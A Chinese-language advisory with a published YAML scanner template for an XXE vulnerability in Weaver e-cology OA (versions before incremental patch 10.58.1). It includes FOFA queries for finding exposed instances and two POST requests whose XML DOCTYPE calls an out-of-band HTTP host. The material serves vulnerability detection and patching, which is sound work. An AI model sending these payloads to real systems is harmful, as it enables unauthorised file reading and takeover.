漏洞描述
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
e-cology 9.x 增量补丁版本 < 10.58.1
FOFA: app="泛微-协同商务系统"
FOFA: app="泛微-协同办公OA"
ecology-oa-deleteuserrequestinfobyxml-xxe: 泛微 OA deleteUserRequestInfoByXml XXE
PoC代码[已公开]
id: ecology-oa-deleteuserrequestinfobyxml-xxe
info:
name: 泛微 OA deleteUserRequestInfoByXml XXE
author: xpoc
severity: high
verified: true
description: |
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
e-cology 9.x 增量补丁版本 < 10.58.1
FOFA: app="泛微-协同商务系统"
FOFA: app="泛微-协同办公OA"
solutions: 安装增量补丁10.58.1,使用10.58.1全量补丁修复无效。
reference:
- https://mp.weixin.qq.com/s/YT64vy3tbAoxj6CQ7XWgUA
- https://mp.weixin.qq.com/s/nqGZL2Ny6m9wrNqlWqu4-Q
- https://mp.weixin.qq.com/s/6p7-R5_VOeDUUobMuqYGcA
- https://stack.chaitin.com/tool/detail?id=1036
tags: ecology,oa,xxe
created: 2023/07/12
set:
oob: oob()
oobHTTP: oob.HTTP
rules:
r0:
request:
method: POST
path: /rest/ofs/deleteUserRequestInfoByXml
headers:
Content-Type: application/xml
body: |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "{{oobHTTP}}">
<M><syscode>&send;</syscode></M>
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
r1:
request:
method: POST
path: /rest/ofs/ReceiveCCRequestByXml
headers:
Content-Type: application/xml
body: |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "{{oobHTTP}}">
<M><syscode>&send;</syscode></M>
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0() || r1()